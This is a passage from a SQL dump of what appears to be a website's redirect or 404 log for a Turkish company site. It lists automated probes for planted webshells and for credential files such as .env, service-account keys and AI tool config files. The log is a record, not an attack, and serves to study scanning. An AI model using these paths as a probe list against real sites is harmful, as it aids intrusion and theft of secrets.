00:00:00',301),(63271,'http://3s-technologies.com.tr/tr/assets/theme_app.php',NULL,'','',3,0,'2026-04-12 20:11:50','0000-00-00 00:00:00',301),(63272,'http://3s-technologies.com.tr/tr/gbl.php',NULL,'','',3,0,'2026-04-12 20:11:52','0000-00-00 00:00:00',301),(63273,'http://3s-technologies.com.tr/tr/.ufc/ss.php',NULL,'','',3,0,'2026-04-12 20:11:53','0000-00-00 00:00:00',301),(63274,'http://3s-technologies.com.tr/tr/tester.php',NULL,'','',3,0,'2026-04-12 20:11:54','0000-00-00 00:00:00',301),(63275,'http://3s-technologies.com.tr/tr/page_m.php',NULL,'','',3,0,'2026-04-12 20:11:55','0000-00-00 00:00:00',301),(63276,'http://3s-technologies.com.tr/tr/wp-themes.php7',NULL,'','',3,0,'2026-04-12 20:11:57','0000-00-00 00:00:00',301),(63277,'http://3s-technologies.com.tr/tr/wong.php',NULL,'','',3,0,'2026-04-12 20:11:58','0000-00-00 00:00:00',301),(63278,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/upfile.php',NULL,'','',3,0,'2026-04-12 20:12:00','0000-00-00 00:00:00',301),(63279,'http://3s-technologies.com.tr/tr/.tmb/users.php',NULL,'','',3,0,'2026-04-12 20:12:02','0000-00-00 00:00:00',301),(63280,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/menu.php',NULL,'','',3,0,'2026-04-12 20:12:02','0000-00-00 00:00:00',301),(63281,'http://3s-technologies.com.tr/tr/.well-known/warm.php7',NULL,'','',3,0,'2026-04-12 20:12:05','0000-00-00 00:00:00',301),(63282,'http://3s-technologies.com.tr/tr/.tmb/warm.php7',NULL,'','',3,0,'2026-04-12 20:12:06','0000-00-00 00:00:00',301),(63283,'http://3s-technologies.com.tr/tr/alfa-priv.php',NULL,'','',3,0,'2026-04-12 20:12:07','0000-00-00 00:00:00',301),(63284,'http://3s-technologies.com.tr/tr/wp-include/alfa.php',NULL,'','',3,0,'2026-04-12 20:12:09','0000-00-00 00:00:00',301),(63285,'http://3s-technologies.com.tr/tr/f77.php',NULL,'','',3,0,'2026-04-12 20:12:10','0000-00-00 00:00:00',301),(63286,'http://3s-technologies.com.tr/tr/fileman/php/upload.php',NULL,'','',3,0,'2026-04-12 20:12:19','0000-00-00 00:00:00',301),(63287,'http://3s-technologies.com.tr/tr/wp-link.php',NULL,'','',3,0,'2026-04-12 20:12:46','0000-00-00 00:00:00',301),(63288,'http://3s-technologies.com.tr/tr/import.php',NULL,'','',3,0,'2026-04-12 20:13:16','0000-00-00 00:00:00',301),(63289,'http://3s-technologies.com.tr/tr/freedoms.php',NULL,'','',3,0,'2026-04-12 20:13:17','0000-00-00 00:00:00',301),(63290,'http://3s-technologies.com.tr/tr/wp-today.php',NULL,'','',3,0,'2026-04-12 20:13:18','0000-00-00 00:00:00',301),(63291,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/admin.php',NULL,'','',3,0,'2026-04-12 20:13:23','0000-00-00 00:00:00',301),(63292,'http://3s-technologies.com.tr/tr/i6z19n.php',NULL,'','',3,0,'2026-04-12 21:02:48','0000-00-00 00:00:00',301),(63293,'http://3s-technologies.com.tr/tr/public/ui/met/images/dt-9.gif',NULL,'http://3s-technologies.com.tr/public/ui/met/images/dt-9.gif','',1,0,'2026-04-13 01:54:00','0000-00-00 00:00:00',301),(63294,'http://3s-technologies.com.tr/tr/public/images/metinfo.gif',NULL,'http://3s-technologies.com.tr/public/images/metinfo.gif','',1,0,'2026-04-13 01:54:01','0000-00-00 00:00:00',301),(63295,'http://3s-technologies.com.tr/tr/lef.php',NULL,'','',3,0,'2026-04-13 07:30:54','0000-00-00 00:00:00',301),(63296,'http://3s-technologies.com.tr/tr/wp-0fsdhv.php',NULL,'','',2,0,'2026-04-13 07:30:56','0000-00-00 00:00:00',301),(63297,'http://3s-technologies.com.tr/tr/mmp.php',NULL,'','',2,0,'2026-04-13 07:31:05','0000-00-00 00:00:00',301),(63298,'http://3s-technologies.com.tr/tr/ahaoi.php',NULL,'','',2,0,'2026-04-13 07:31:08','0000-00-00 00:00:00',301),(63299,'http://3s-technologies.com.tr/tr/bogles.php',NULL,'','',2,0,'2026-04-13 07:31:09','0000-00-00 00:00:00',301),(63300,'http://3s-technologies.com.tr/tr/greateb.php',NULL,'','',2,0,'2026-04-13 07:31:15','0000-00-00 00:00:00',301),(63301,'http://3s-technologies.com.tr/tr/mjq.php/kma.php',NULL,'','',2,0,'2026-04-13 07:31:17','0000-00-00 00:00:00',301),(63302,'http://3s-technologies.com.tr/tr/bjeni.php',NULL,'','',3,0,'2026-04-13 07:31:17','0000-00-00 00:00:00',301),(63303,'http://3s-technologies.com.tr/tr/xl9.php',NULL,'','',2,0,'2026-04-13 07:31:23','0000-00-00 00:00:00',301),(63304,'http://3s-technologies.com.tr/tr/wp-4sd6kt.php',NULL,'','',2,0,'2026-04-13 07:31:25','0000-00-00 00:00:00',301),(63305,'http://3s-technologies.com.tr/tr/x7w.php',NULL,'','',2,0,'2026-04-13 07:31:28','0000-00-00 00:00:00',301),(63306,'http://3s-technologies.com.tr/tr/lolz.php',NULL,'','',2,0,'2026-04-13 07:31:36','0000-00-00 00:00:00',301),(63307,'http://3s-technologies.com.tr/tr/rea889y.php',NULL,'','',3,0,'2026-04-13 07:31:39','0000-00-00 00:00:00',301),(63308,'http://3s-technologies.com.tr/tr/ianmg.php',NULL,'','',2,0,'2026-04-13 07:31:46','0000-00-00 00:00:00',301),(63309,'http://3s-technologies.com.tr/tr/mas80.php',NULL,'','',2,0,'2026-04-13 07:31:50','0000-00-00 00:00:00',301),(63310,'http://3s-technologies.com.tr/tr/wp-upload.php',NULL,'','',3,0,'2026-04-13 07:31:52','0000-00-00 00:00:00',301),(63311,'http://3s-technologies.com.tr/tr/fcnlp.php',NULL,'','',2,0,'2026-04-13 07:31:53','0000-00-00 00:00:00',301),(63312,'http://3s-technologies.com.tr/tr/bngv.php',NULL,'','',2,0,'2026-04-13 07:31:56','0000-00-00 00:00:00',301),(63313,'http://3s-technologies.com.tr/tr/kiwkiw.php',NULL,'','',2,0,'2026-04-13 07:31:58','0000-00-00 00:00:00',301),(63314,'http://3s-technologies.com.tr/tr/bdktk.php',NULL,'','',4,0,'2026-04-13 07:32:01','0000-00-00 00:00:00',301),(63315,'http://3s-technologies.com.tr/tr/rujgeote.php',NULL,'','',2,0,'2026-04-13 07:32:04','0000-00-00 00:00:00',301),(63316,'http://3s-technologies.com.tr/tr/css/shlo.php',NULL,'','',2,0,'2026-04-13 07:32:04','0000-00-00 00:00:00',301),(63317,'http://3s-technologies.com.tr/tr/wp-tymanage.php',NULL,'','',2,0,'2026-04-13 07:32:13','0000-00-00 00:00:00',301),(63318,'http://3s-technologies.com.tr/tr/bardbdze.php',NULL,'','',2,0,'2026-04-13 07:32:17','0000-00-00 00:00:00',301),(63319,'http://3s-technologies.com.tr/tr/amxloxxr.php',NULL,'','',9,0,'2026-04-13 07:32:19','0000-00-00 00:00:00',301),(63320,'http://3s-technologies.com.tr/tr/haz.php',NULL,'','',3,0,'2026-04-13 07:32:26','0000-00-00 00:00:00',301),(63321,'http://3s-technologies.com.tr/tr/f222.php',NULL,'','',3,0,'2026-04-13 07:32:26','0000-00-00 00:00:00',301),(63322,'http://3s-technologies.com.tr/tr/enacting.php',NULL,'','',2,0,'2026-04-13 07:32:30','0000-00-00 00:00:00',301),(63323,'http://3s-technologies.com.tr/tr/cilng.php',NULL,'','',3,0,'2026-04-13 07:32:31','0000-00-00 00:00:00',301),(63324,'http://3s-technologies.com.tr/tr/nti.php',NULL,'','',2,0,'2026-04-13 07:32:33','0000-00-00 00:00:00',301),(63325,'http://3s-technologies.com.tr/tr/nco.php',NULL,'','',2,0,'2026-04-13 07:32:35','0000-00-00 00:00:00',301),(63326,'http://3s-technologies.com.tr/tr/wp-stat.php',NULL,'','',2,0,'2026-04-13 07:32:37','0000-00-00 00:00:00',301),(63327,'http://3s-technologies.com.tr/tr/zo.php/itil.php',NULL,'','',2,0,'2026-04-13 07:32:41','0000-00-00 00:00:00',301),(63328,'http://3s-technologies.com.tr/tr/zwq.php',NULL,'','',2,0,'2026-04-13 07:32:41','0000-00-00 00:00:00',301),(63329,'http://3s-technologies.com.tr/tr/bx.php',NULL,'','',3,0,'2026-04-13 07:32:49','0000-00-00 00:00:00',301),(63330,'http://3s-technologies.com.tr/tr/classc.php',NULL,'','',2,0,'2026-04-13 07:32:56','0000-00-00 00:00:00',301),(63331,'http://3s-technologies.com.tr/tr/admin/assets/global/plugins/plupload/examples/upload.php',NULL,'','',3,0,'2026-04-13 14:07:57','0000-00-00 00:00:00',301),(63332,'https://3s-technologies.com.tr/tr/graphql',NULL,'','',1,0,'2026-04-13 20:39:51','0000-00-00 00:00:00',301),(63333,'http://3s-technologies.com.tr/tr/mifta.php',NULL,'','',14,0,'2026-04-14 00:01:12','0000-00-00 00:00:00',301),(63334,'http://3s-technologies.com.tr/tr/son1.php',NULL,'','',14,0,'2026-04-14 00:01:15','0000-00-00 00:00:00',301),(63335,'http://3s-technologies.com.tr/tr/tiny',NULL,'','',2,0,'2026-04-14 00:01:25','0000-00-00 00:00:00',301),(63336,'http://3s-technologies.com.tr/tr/aios-bootstrap.php',NULL,'','',4,0,'2026-04-14 00:01:45','0000-00-00 00:00:00',301),(63337,'http://3s-technologies.com.tr/tr/gz.php',NULL,'','',9,0,'2026-04-14 00:01:46','0000-00-00 00:00:00',301),(63338,'http://3s-technologies.com.tr/tr/wp-kz.php',NULL,'','',16,0,'2026-04-14 00:01:52','0000-00-00 00:00:00',301),(63339,'http://3s-technologies.com.tr/tr/wp-lo.php',NULL,'','',2,0,'2026-04-14 00:01:53','0000-00-00 00:00:00',301),(63340,'http://3s-technologies.com.tr/tr/ipv6.php',NULL,'','',2,0,'2026-04-14 00:01:54','0000-00-00 00:00:00',301),(63341,'http://3s-technologies.com.tr/tr/xper.php',NULL,'','',2,0,'2026-04-14 00:01:57','0000-00-00 00:00:00',301),(63342,'http://3s-technologies.com.tr/tr/wp-includes/wincust.php',NULL,'','',2,0,'2026-04-14 00:02:04','0000-00-00 00:00:00',301),(63343,'http://3s-technologies.com.tr/tr/xynz.php',NULL,'','',9,0,'2026-04-14 00:02:08','0000-00-00 00:00:00',301),(63344,'http://3s-technologies.com.tr/tr/wp-01ul.php',NULL,'','',4,0,'2026-04-14 00:02:09','0000-00-00 00:00:00',301),(63345,'http://3s-technologies.com.tr/tr/e7.php',NULL,'','',2,0,'2026-04-14 00:02:10','0000-00-00 00:00:00',301),(63346,'http://3s-technologies.com.tr/tr/e3.php',NULL,'','',4,0,'2026-04-14 00:02:10','0000-00-00 00:00:00',301),(63347,'http://3s-technologies.com.tr/tr/aevly.php',NULL,'','',23,0,'2026-04-14 00:02:11','0000-00-00 00:00:00',301),(63348,'http://3s-technologies.com.tr/tr/goods_260325043000.php',NULL,'','',2,0,'2026-04-14 00:02:17','0000-00-00 00:00:00',301),(63349,'http://3s-technologies.com.tr/tr/goods_260401065719.php',NULL,'','',2,0,'2026-04-14 00:02:18','0000-00-00 00:00:00',301),(63350,'https://www.3s-technologies.com.tr/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-14 18:24:29','0000-00-00 00:00:00',301),(63351,'https://www.3s-technologies.com.tr/alfa_data/alfacgiapi/perl.alfa',NULL,'','',1,0,'2026-04-14 18:24:30','0000-00-00 00:00:00',301),(63352,'http://mail.3s-technologies.com.tr/tr/unsubscribe.php',NULL,'','',2,0,'2026-04-14 18:57:17','0000-00-00 00:00:00',301),(63353,'http://mail.3s-technologies.com.tr/tr/hh.php',NULL,'','',3,0,'2026-04-14 18:57:48','0000-00-00 00:00:00',301),(63354,'http://mail.3s-technologies.com.tr/tr/t/rfi.php',NULL,'','',4,0,'2026-04-14 18:59:22','0000-00-00 00:00:00',301),(63355,'http://3s-technologies.com.tr/tr/unsubscribe.php',NULL,'','',2,0,'2026-04-14 20:46:48','0000-00-00 00:00:00',301),(63356,'http://3s-technologies.com.tr/tr/ goods.php',NULL,'','',4,0,'2026-04-14 20:47:23','0000-00-00 00:00:00',301),(63357,'http://3s-technologies.com.tr/tr/t/rfi.php',NULL,'','',9,0,'2026-04-14 20:48:40','0000-00-00 00:00:00',301),(63358,'http://3s-technologies.com.tr/tr/public/css.php',NULL,'','',8,0,'2026-04-15 07:22:29','0000-00-00 00:00:00',301),(63359,'http://3s-technologies.com.tr/tr/wp-content/uploads/goods.php',NULL,'','',8,0,'2026-04-15 07:23:17','0000-00-00 00:00:00',301),(63360,'http://3s-technologies.com.tr/tr/wp-xme.php',NULL,'','',10,0,'2026-04-15 12:09:29','0000-00-00 00:00:00',301),(63361,'http://3s-technologies.com.tr/tr/136.php',NULL,'','',2,0,'2026-04-15 12:09:30','0000-00-00 00:00:00',301),(63362,'http://3s-technologies.com.tr/tr/amdin.php',NULL,'','',10,0,'2026-04-15 12:09:32','0000-00-00 00:00:00',301),(63363,'http://3s-technologies.com.tr/tr/huya.php',NULL,'','',10,0,'2026-04-15 12:09:33','0000-00-00 00:00:00',301),(63364,'http://3s-technologies.com.tr/tr/puc.php',NULL,'','',15,0,'2026-04-15 12:09:33','0000-00-00 00:00:00',301),(63365,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/admin',NULL,'','',3,0,'2026-04-15 12:10:48','0000-00-00 00:00:00',301),(63366,'http://3s-technologies.com.tr/tr/hypo.php',NULL,'','',16,0,'2026-04-15 12:10:59','0000-00-00 00:00:00',301),(63367,'http://mail.3s-technologies.com.tr/tr/wp-xme.php',NULL,'','',5,0,'2026-04-15 15:47:14','0000-00-00 00:00:00',301),(63368,'http://mail.3s-technologies.com.tr/tr/136.php',NULL,'','',1,0,'2026-04-15 15:47:15','0000-00-00 00:00:00',301),(63369,'http://mail.3s-technologies.com.tr/tr/amdin.php',NULL,'','',5,0,'2026-04-15 15:47:17','0000-00-00 00:00:00',301),(63370,'http://mail.3s-technologies.com.tr/tr/huya.php',NULL,'','',5,0,'2026-04-15 15:47:17','0000-00-00 00:00:00',301),(63371,'http://mail.3s-technologies.com.tr/tr/puc.php',NULL,'','',6,0,'2026-04-15 15:47:18','0000-00-00 00:00:00',301),(63372,'http://mail.3s-technologies.com.tr/tr/ewp.php',NULL,'','',7,0,'2026-04-15 15:47:18','0000-00-00 00:00:00',301),(63373,'http://mail.3s-technologies.com.tr/tr/kikikoko.php',NULL,'','',6,0,'2026-04-15 15:47:19','0000-00-00 00:00:00',301),(63374,'http://mail.3s-technologies.com.tr/tr/nwflm.php',NULL,'','',3,0,'2026-04-15 15:47:19','0000-00-00 00:00:00',301),(63375,'http://mail.3s-technologies.com.tr/tr/awa.php',NULL,'','',7,0,'2026-04-15 15:47:21','0000-00-00 00:00:00',301),(63376,'http://mail.3s-technologies.com.tr/tr/popo.php',NULL,'','',7,0,'2026-04-15 15:47:22','0000-00-00 00:00:00',301),(63377,'http://mail.3s-technologies.com.tr/tr/wert.php',NULL,'','',3,0,'2026-04-15 15:47:23','0000-00-00 00:00:00',301),(63378,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests',NULL,'','',6,0,'2026-04-15 15:47:25','0000-00-00 00:00:00',301),(63379,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/admin',NULL,'','',1,0,'2026-04-15 15:48:14','0000-00-00 00:00:00',301),(63380,'http://mail.3s-technologies.com.tr/tr/hypo.php',NULL,'','',6,0,'2026-04-15 15:48:23','0000-00-00 00:00:00',301),(63381,'http://mail.3s-technologies.com.tr/tr/hroxw.php',NULL,'','',3,0,'2026-04-15 15:50:21','0000-00-00 00:00:00',301),(63382,'http://mail.3s-technologies.com.tr/tr/gaza.php',NULL,'','',3,0,'2026-04-15 15:50:22','0000-00-00 00:00:00',301),(63383,'http://www.3s-technologies.com.tr/tr/wp-admin/network/users.php',NULL,'','',2,0,'2026-04-15 16:26:22','0000-00-00 00:00:00',301),(63384,'http://www.3s-technologies.com.tr/tr/admlo.php',NULL,'','',2,0,'2026-04-15 16:26:26','0000-00-00 00:00:00',301),(63385,'http://www.3s-technologies.com.tr/tr/bmi.php',NULL,'','',2,0,'2026-04-15 16:26:36','0000-00-00 00:00:00',301),(63386,'http://www.3s-technologies.com.tr/tr/aboute.php',NULL,'','',3,0,'2026-04-15 16:26:39','0000-00-00 00:00:00',301),(63387,'http://www.3s-technologies.com.tr/tr/900.php',NULL,'','',2,0,'2026-04-15 16:27:07','0000-00-00 00:00:00',301),(63388,'http://www.3s-technologies.com.tr/tr/ws82.php',NULL,'','',2,0,'2026-04-15 16:27:12','0000-00-00 00:00:00',301),(63389,'http://www.3s-technologies.com.tr/tr/wp-admin/network/edit.php',NULL,'','',2,0,'2026-04-15 16:27:13','0000-00-00 00:00:00',301),(63390,'http://www.3s-technologies.com.tr/tr/ws48.php',NULL,'','',2,0,'2026-04-15 16:27:13','0000-00-00 00:00:00',301),(63391,'http://www.3s-technologies.com.tr/tr/yw5bi63u.php',NULL,'','',2,0,'2026-04-15 16:27:23','0000-00-00 00:00:00',301),(63392,'http://www.3s-technologies.com.tr/tr/ws57.php',NULL,'','',3,0,'2026-04-15 16:27:24','0000-00-00 00:00:00',301),(63393,'http://www.3s-technologies.com.tr/tr/mode.php',NULL,'','',2,0,'2026-04-15 16:27:29','0000-00-00 00:00:00',301),(63394,'http://www.3s-technologies.com.tr/tr/set.php',NULL,'','',2,0,'2026-04-15 16:27:30','0000-00-00 00:00:00',301),(63395,'http://www.3s-technologies.com.tr/tr/hroxw.php',NULL,'','',2,0,'2026-04-15 16:27:31','0000-00-00 00:00:00',301),(63396,'http://www.3s-technologies.com.tr/tr/retu11.php7',NULL,'','',2,0,'2026-04-15 16:27:33','0000-00-00 00:00:00',301),(63397,'http://www.3s-technologies.com.tr/tr/ioxi001.php7',NULL,'','',2,0,'2026-04-15 16:27:34','0000-00-00 00:00:00',301),(63398,'http://www.3s-technologies.com.tr/tr/mk.php',NULL,'','',2,0,'2026-04-15 16:27:35','0000-00-00 00:00:00',301),(63399,'http://3s-technologies.com.tr/en/.openai/config.json',NULL,'','',1,0,'2026-04-15 22:53:49','0000-00-00 00:00:00',301),(63400,'http://3s-technologies.com.tr/en/.cursor/mcp.json',NULL,'','',1,0,'2026-04-15 22:53:49','0000-00-00 00:00:00',301),(63401,'http://3s-technologies.com.tr/en/.anthropic/config.json',NULL,'','',1,0,'2026-04-15 22:53:49','0000-00-00 00:00:00',301),(63402,'http://3s-technologies.com.tr/en/.env.staging',NULL,'','',1,0,'2026-04-15 22:53:49','0000-00-00 00:00:00',301),(63403,'http://3s-technologies.com.tr/en/serviceaccountkey.json',NULL,'','',1,0,'2026-04-15 22:53:49','0000-00-00 00:00:00',301),(63404,'http://3s-technologies.com.tr/en/.env.local',NULL,'','',1,0,'2026-04-15 22:53:50','0000-00-00 00:00:00',301),(63405,'http://3s-technologies.com.tr/en/src/.env',NULL,'','',1,0,'2026-04-15 22:53:52','0000-00-00 00:00:00',301),(63406,'http://3s-technologies.com.tr/en/.env.production',NULL,'','',1,0,'2026-04-15 22:53:52','0000-00-00 00:00:00',301),(63407,'http://3s-technologies.com.tr/en/server/.env',NULL,'','',1,0,'2026-04-15 22:53:52','0000-00-00 00:00:00',301),(63408,'https://3s-technologies.com.tr/en/joomla/administrator',NULL,'','',2,0,'2026-04-16 00:23:55','0000-00-00 00:00:00',301),(63409,'https://3s-technologies.com.tr/en/site/administrator',NULL,'','',2,0,'2026-04-16 00:23:57','0000-00-00 00:00:00',301),(63410,'https://3s-technologies.com.tr/en/blog/administrator',NULL,'','',2,0,'2026-04-16 00:23:58','0000-00-00 00:00:00',301),(63411,'https://3s-technologies.com.tr/en/cms/administrator',NULL,'','',2,0,'2026-04-16 00:23:59','0000-00-00 00:00:00',301),(63412,'https://3s-technologies.com.tr/en/web/administrator',NULL,'','',2,0,'2026-04-16 00:23:59','0000-00-00 00:00:00',301),(63413,'https://3s-technologies.com.tr/en/portal/administrator',NULL,'','',2,0,'2026-04-16 00:24:00','0000-00-00 00:00:00',301),(63414,'https://3s-technologies.com.tr/en/main/administrator',NULL,'','',2,0,'2026-04-16 00:24:01','0000-00-00 00:00:00',301),(63415,'https://3s-technologies.com.tr/en/new/administrator',NULL,'','',2,0,'2026-04-16 00:24:02','0000-00-00 00:00:00',301),(63416,'https://3s-technologies.com.tr/en/old/administrator',NULL,'','',2,0,'2026-04-16 00:24:02','0000-00-00 00:00:00',301),(63417,'https://3s-technologies.com.tr/en/test/administrator',NULL,'','',2,0,'2026-04-16 00:24:03','0000-00-00 00:00:00',301),(63418,'https://3s-technologies.com.tr/en/dev/administrator',NULL,'','',2,0,'2026-04-16 00:24:03','0000-00-00 00:00:00',301),(63419,'https://3s-technologies.com.tr/en/staging/administrator',NULL,'','',2,0,'2026-04-16 00:24:04','0000-00-00 00:00:00',301),(63420,'https://3s-technologies.com.tr/en/backup/administrator',NULL,'','',2,0,'2026-04-16 00:24:05','0000-00-00 00:00:00',301),(63421,'https://3s-technologies.com.tr/en/j/administrator',NULL,'','',2,0,'2026-04-16 00:24:06','0000-00-00 00:00:00',301),(63422,'https://3s-technologies.com.tr/en/home/administrator',NULL,'','',2,0,'2026-04-16 00:24:06','0000-00-00 00:00:00',301),(63423,'https://3s-technologies.com.tr/en/public/administrator',NULL,'','',2,0,'2026-04-16 00:24:07','0000-00-00 00:00:00',301),(63424,'https://3s-technologies.com.tr/en/www/administrator',NULL,'','',2,0,'2026-04-16 00:24:08','0000-00-00 00:00:00',301),(63425,'https://3s-technologies.com.tr/en/administrator/',NULL,'','',2,0,'2026-04-16 00:24:08','0000-00-00 00:00:00',301),(63426,'http://3s-technologies.com.tr/tr/.well-known/adminer.php',NULL,'','',1,0,'2026-04-16 10:05:09','0000-00-00 00:00:00',301),(63427,'http://3s-technologies.com.tr/tr/ypp.php',NULL,'','',1,0,'2026-04-16 10:05:10','0000-00-00 00:00:00',301),(63428,'http://3s-technologies.com.tr/tr/2468.php',NULL,'','',8,0,'2026-04-16 10:05:11','0000-00-00 00:00:00',301),(63429,'http://3s-technologies.com.tr/tr/eterezrezt.php',NULL,'','',1,0,'2026-04-16 10:05:11','0000-00-00 00:00:00',301),(63430,'http://mail.3s-technologies.com.tr/tr/wp-includes/ubbgmq.php',NULL,'','',1,0,'2026-04-16 18:14:44','0000-00-00 00:00:00',301),(63431,'http://mail.3s-technologies.com.tr/tr/wp-includes/oqjlcq.php',NULL,'','',1,0,'2026-04-16 18:14:44','0000-00-00 00:00:00',301),(63432,'http://mail.3s-technologies.com.tr/tr/public/index.php',NULL,'','',1,0,'2026-04-16 18:14:45','0000-00-00 00:00:00',301),(63433,'http://mail.3s-technologies.com.tr/tr/public/az.php',NULL,'','',1,0,'2026-04-16 18:14:46','0000-00-00 00:00:00',301),(63434,'http://mail.3s-technologies.com.tr/tr/app/utils/language.php',NULL,'','',1,0,'2026-04-16 18:14:49','0000-00-00 00:00:00',301),(63435,'http://mail.3s-technologies.com.tr/tr/wp-admin/nav-menus.php',NULL,'','',1,0,'2026-04-16 18:14:57','0000-00-00 00:00:00',301),(63436,'http://mail.3s-technologies.com.tr/tr/archive.php',NULL,'','',3,0,'2026-04-16 18:15:37','0000-00-00 00:00:00',301),(63437,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-wp-http-client.php',NULL,'','',3,0,'2026-04-16 18:15:44','0000-00-00 00:00:00',301),(63438,'http://mail.3s-technologies.com.tr/tr/wp-includes/configuration.php',NULL,'','',3,0,'2026-04-16 18:15:44','0000-00-00 00:00:00',301),(63439,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/twenty/login.php',NULL,'','',2,0,'2026-04-16 18:16:11','0000-00-00 00:00:00',301),(63440,'http://mail.3s-technologies.com.tr/tr/.dj/index.php',NULL,'','',6,0,'2026-04-16 18:16:15','0000-00-00 00:00:00',301),(63441,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/beteng88/ws83.php',NULL,'','',2,0,'2026-04-16 18:16:35','0000-00-00 00:00:00',301),(63442,'http://mail.3s-technologies.com.tr/tr/onclickfuns.php',NULL,'','',2,0,'2026-04-16 18:17:02','0000-00-00 00:00:00',301),(63443,'http://3s-technologies.com.tr/tr/wp-includes/ubbgmq.php',NULL,'','',2,0,'2026-04-16 20:00:24','0000-00-00 00:00:00',301),(63444,'http://3s-technologies.com.tr/tr/wp-includes/oqjlcq.php',NULL,'','',2,0,'2026-04-16 20:00:24','0000-00-00 00:00:00',301),(63445,'http://3s-technologies.com.tr/tr/public/az.php',NULL,'','',2,0,'2026-04-16 20:00:26','0000-00-00 00:00:00',301),(63446,'http://3s-technologies.com.tr/tr/app/utils/language.php',NULL,'','',2,0,'2026-04-16 20:00:28','0000-00-00 00:00:00',301),(63447,'http://3s-technologies.com.tr/tr/wp-admin/nav-menus.php',NULL,'','',2,0,'2026-04-16 20:00:33','0000-00-00 00:00:00',301),(63448,'http://3s-technologies.com.tr/tr/archive.php',NULL,'','',6,0,'2026-04-16 20:01:10','0000-00-00 00:00:00',301),(63449,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-http-client.php',NULL,'','',3,0,'2026-04-16 20:01:15','0000-00-00 00:00:00',301),(63450,'http://3s-technologies.com.tr/tr/wp-includes/configuration.php',NULL,'','',2,0,'2026-04-16 20:01:16','0000-00-00 00:00:00',301),(63451,'http://3s-technologies.com.tr/tr/.dj/index.php',NULL,'','',15,0,'2026-04-16 20:01:50','0000-00-00 00:00:00',301),(63452,'http://3s-technologies.com.tr/tr/wp-content/plugins/beteng88/ws83.php',NULL,'','',7,0,'2026-04-16 20:02:10','0000-00-00 00:00:00',301),(63453,'http://3s-technologies.com.tr/tr/lib/filelib.php',NULL,'','',2,0,'2026-04-16 21:15:47','0000-00-00 00:00:00',301),(63454,'http://3s-technologies.com.tr/tr/pluginfile.php',NULL,'','',2,0,'2026-04-16 21:15:48','0000-00-00 00:00:00',301),(63455,'http://3s-technologies.com.tr/tr/lib/setup.php',NULL,'','',2,0,'2026-04-16 21:15:49','0000-00-00 00:00:00',301),(63456,'http://3s-technologies.com.tr/tr/auth/oauth2/lib.php',NULL,'','',2,0,'2026-04-16 21:15:51','0000-00-00 00:00:00',301),(63457,'http://3s-technologies.com.tr/tr/cgiag/mycgia/lib/weblib.php',NULL,'','',2,0,'2026-04-16 21:15:52','0000-00-00 00:00:00',301),(63458,'http://3s-technologies.com.tr/tr/well-known',NULL,'','',2,0,'2026-04-16 21:16:34','0000-00-00 00:00:00',301),(63459,'http://mail.3s-technologies.com.tr/tr/sl.php',NULL,'','',4,0,'2026-04-16 23:40:15','0000-00-00 00:00:00',301),(63460,'http://mail.3s-technologies.com.tr/tr/flox.php',NULL,'','',3,0,'2026-04-16 23:40:16','0000-00-00 00:00:00',301),(63461,'http://mail.3s-technologies.com.tr/tr/mff.php',NULL,'','',2,0,'2026-04-16 23:40:16','0000-00-00 00:00:00',301),(63462,'http://mail.3s-technologies.com.tr/tr/filemanger2.php',NULL,'','',2,0,'2026-04-16 23:40:17','0000-00-00 00:00:00',301),(63463,'http://mail.3s-technologies.com.tr/tr/wp-vn1.php',NULL,'','',2,0,'2026-04-16 23:40:18','0000-00-00 00:00:00',301),(63464,'http://mail.3s-technologies.com.tr/tr/water.php',NULL,'','',2,0,'2026-04-16 23:40:24','0000-00-00 00:00:00',301),(63465,'http://mail.3s-technologies.com.tr/tr/oij98gy.php',NULL,'','',2,0,'2026-04-16 23:40:30','0000-00-00 00:00:00',301),(63466,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',1,0,'2026-04-17 08:29:20','0000-00-00 00:00:00',301),(63467,'http://www.3s-technologies.com.tr/tr/tymi.php',NULL,'','',1,0,'2026-04-17 09:32:34','0000-00-00 00:00:00',301),(63468,'http://www.3s-technologies.com.tr/tr/ss72_kkkjt.php',NULL,'','',1,0,'2026-04-17 09:32:36','0000-00-00 00:00:00',301),(63469,'http://www.3s-technologies.com.tr/tr/wkogn.php',NULL,'','',1,0,'2026-04-17 09:32:37','0000-00-00 00:00:00',301),(63470,'http://www.3s-technologies.com.tr/tr/hwjtry0zd1fzeakcuzn8cdefault.php',NULL,'','',1,0,'2026-04-17 09:32:38','0000-00-00 00:00:00',301),(63471,'http://www.3s-technologies.com.tr/tr/cilus.php',NULL,'','',3,0,'2026-04-17 09:32:39','0000-00-00 00:00:00',301),(63472,'http://www.3s-technologies.com.tr/tr/olezrvqmjjpfsucdefault.php',NULL,'','',1,0,'2026-04-17 09:32:39','0000-00-00 00:00:00',301),(63473,'http://www.3s-technologies.com.tr/tr/wwdgl.php',NULL,'','',1,0,'2026-04-17 09:32:40','0000-00-00 00:00:00',301),(63474,'http://www.3s-technologies.com.tr/tr/hla-dd.php',NULL,'','',1,0,'2026-04-17 09:32:41','0000-00-00 00:00:00',301),(63475,'http://www.3s-technologies.com.tr/tr/bhqks28cw94.php',NULL,'','',1,0,'2026-04-17 09:32:42','0000-00-00 00:00:00',301),(63476,'http://www.3s-technologies.com.tr/tr/cdn3.php',NULL,'','',1,0,'2026-04-17 09:32:42','0000-00-00 00:00:00',301),(63477,'http://www.3s-technologies.com.tr/tr/beerd.php',NULL,'','',1,0,'2026-04-17 09:32:44','0000-00-00 00:00:00',301),(63478,'http://www.3s-technologies.com.tr/tr/161dfd072f.php',NULL,'','',1,0,'2026-04-17 09:32:45','0000-00-00 00:00:00',301),(63479,'http://www.3s-technologies.com.tr/tr/ylzed0twj8l9drdbchc1oocfcdefault.php',NULL,'','',1,0,'2026-04-17 09:32:46','0000-00-00 